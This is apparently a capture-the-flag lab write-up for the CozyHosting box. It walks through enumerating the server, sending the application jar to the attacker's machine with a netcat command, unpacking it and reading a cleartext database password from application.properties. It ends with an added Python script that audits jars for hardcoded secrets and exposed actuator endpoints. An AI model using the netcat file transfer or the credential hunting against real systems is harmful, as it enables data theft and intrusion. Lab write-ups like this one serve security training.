Cozy Cloud
Checking the source of the target web application after performing basic enumeration
app@cozyhosting:/app$ find / -name cozy* -ls 2>/dev/null
280132 0 lrwxrwxrwx 1 root root 39 may 18 15:01 /etc/systemd/system/multi-user.target.wants/cozyhosting.service -> /etc/systemd/system/cozyhosting.service
280107 4 -rw-r--r-- 1 root root 287 may 18 13:52 /etc/systemd/system/cozyhosting.service
2497 0 drwxr-xr-x 2 root root 0 sep 9 12:37 /sys/fs/cgroup/system.slice/cozyhosting.service
app@cozyhosting:/app$ find / -name cloud* -ls 2>/dev/null
121 58848 -rw-r--r-- 1 root root 60259688 aug 11 00:45 /app/cloudhosting-0.0.1.jar
PEAS earlier picked up the service unit for the web application: cozyhosting.service
Service
app@cozyhosting:/app$ cat /etc/systemd/system/cozyhosting.service
[Unit]
Description=Cozy Hosting Web Page
After=syslog.target network.target
[Service]
SuccessExitStatus=143
User=app
Group=app
Type=simple
WorkingDirectory=/app
ExecStart=/usr/bin/java -jar cloudhosting-0.0.1.jar
ExecStop=/bin/kill -15 $MAINPID
[Install]
WantedBy=multi-user.target
app@cozyhosting:/app$ ll
total 58M
4.0K drwxr-xr-x 2 root root 4.0K Aug 14 14:11 .
4.0K drwxr-xr-x 19 root root 4.0K Aug 14 14:11 ..
58M -rw-r--r-- 1 root root 58M Aug 11 00:45 cloudhosting-0.0.1.jar
I will transfer the source file to Kali for further enumeration
app@cozyhosting:/app$ nc 10.10.14.4 2222 < cloudhosting-0.0.1.jar
┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ nnc 2222 > cloudhosting-0.0.1.jar
listening on [any] 2222 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.230] 32864
Transfer complete
Source
┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ 7z x cloudhosting-0.0.1.jar
7-zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,32 CPUs 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz (806D1),ASM,AES-NI)
scanning the drive for archives:
1 file, 60259688 bytes (58 MiB)
extracting archive: cloudhosting-0.0.1.jar
--
Path = cloudhosting-0.0.1.jar
Type = zip
Physical Size = 60259688
Everything is Ok
folders: 46
files: 265
size: 99339843
compressed: 60259688
Extracting the content
┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ ll
total 58M
4.0k drwxr-xr-x 5 kali kali 4.0k sep 9 23:51 .
58m -rw-r--r-- 1 kali kali 58m sep 9 23:51 cloudhosting-0.0.1.jar
4.0k drwxr-xr-x 3 kali kali 4.0k sep 9 23:51 ..
4.0k drwxr-xr-x 4 kali kali 4.0k aug 10 23:22 BOOT-INF
4.0k drwxr-xr-x 3 kali kali 4.0k aug 10 23:22 META-INF
4.0K drwxr-xr-x 3 kali kali 4.0K Jan 31 1980 org
┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ ll BOOT-INF
total 24K
4.0k drwxr-xr-x 5 kali kali 4.0k sep 9 23:51 ..
4.0k -rw-r--r-- 1 kali kali 3.2k aug 10 23:22 classpath.idx
4.0k -rw-r--r-- 1 kali kali 212 aug 10 23:22 layers.idx
4.0k drwxr-xr-x 2 kali kali 4.0k aug 10 23:22 lib
4.0k drwxr-xr-x 4 kali kali 4.0k aug 10 23:22 .
4.0k drwxr-xr-x 5 kali kali 4.0k aug 10 23:22 classes
┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ ll BOOT-INF/classes
total 24K
4.0k drwxr-xr-x 5 kali kali 4.0k aug 10 23:22 .
4.0k drwxr-xr-x 4 kali kali 4.0k aug 10 23:22 ..
4.0k drwxr-xr-x 3 kali kali 4.0k aug 10 23:22 htb
4.0k drwxr-xr-x 2 kali kali 4.0k aug 10 23:22 templates
4.0k -rw-r--r-- 1 kali kali 551 aug 10 23:22 application.properties
4.0k drwxr-xr-x 3 kali kali 4.0k aug 10 23:22 static
While there is a lot of content inside, I will check the application.properties file
CLEARTEXT Credential
┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ cat BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
The web application indeed uses PostgreSQL as its backend DB on 127.0.0.1:5432
Additionally, there is a CLEARTEXT credential: postgres:Vg&nvzAQ7XxR
This would allow me to enumerate the PostgreSQL instance
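A build-time check for the two weaknesses visible in this jar, a literal secret in application.properties and sensitive actuator endpoints exposed over the web, as an added example that is not part of the original write-up. The sample jars, the placeholder password and the DB_PASSWORD variable name are constructed for illustration.

```python
import io
import re
import zipfile

PROPS_PATH = "BOOT-INF/classes/application.properties"
SECRET_KEY = re.compile(r"(password|secret|token|api[-_.]?key)$", re.I)
RISKY_ACTUATOR = {"env", "sessions", "beans", "mappings", "heapdump", "*"}

# Constructed samples: WEAK mirrors the keys shown above with a placeholder password.
WEAK = """management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
spring.datasource.password=EXAMPLE-not-a-real-password
"""
# HARDENED resolves the secret at runtime (DB_PASSWORD is an assumed variable name).
HARDENED = """management.endpoints.web.exposure.include=health
spring.datasource.password=${DB_PASSWORD}
"""

def build_sample_jar(properties_text):
    """Build an in-memory zip laid out like a Spring Boot fat jar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(PROPS_PATH, properties_text)
    return buf.getvalue()

def parse_properties(text):
    """Parse simple 'key=value' / 'key: value' lines, skipping comments."""
    props = {}
    for line in text.splitlines():
        match = re.match(r"\s*([^#!=:\s][^=:\s]*)\s*[=:]\s*(.*)", line)
        if match:
            props[match.group(1)] = match.group(2).strip()
    return props

def audit_jar(jar_bytes):
    """Return (key, issue) findings for the properties packaged in the jar."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        if PROPS_PATH not in jar.namelist():
            return findings
        props = parse_properties(jar.read(PROPS_PATH).decode("utf-8", "replace"))
    for key, value in props.items():
        # A literal value ships inside the artifact; ${...} is resolved at runtime.
        if SECRET_KEY.search(key) and value and not value.startswith("${"):
            findings.append((key, "hardcoded secret"))
        if key == "management.endpoints.web.exposure.include":
            exposed = {e.strip() for e in value.split(",")} & RISKY_ACTUATOR
            if exposed:
                findings.append((key, "exposed: " + ",".join(sorted(exposed))))
    return findings
```

Running audit_jar over the bytes of a release artifact in CI catches a packaged credential before the jar reaches a host where any local user can read it.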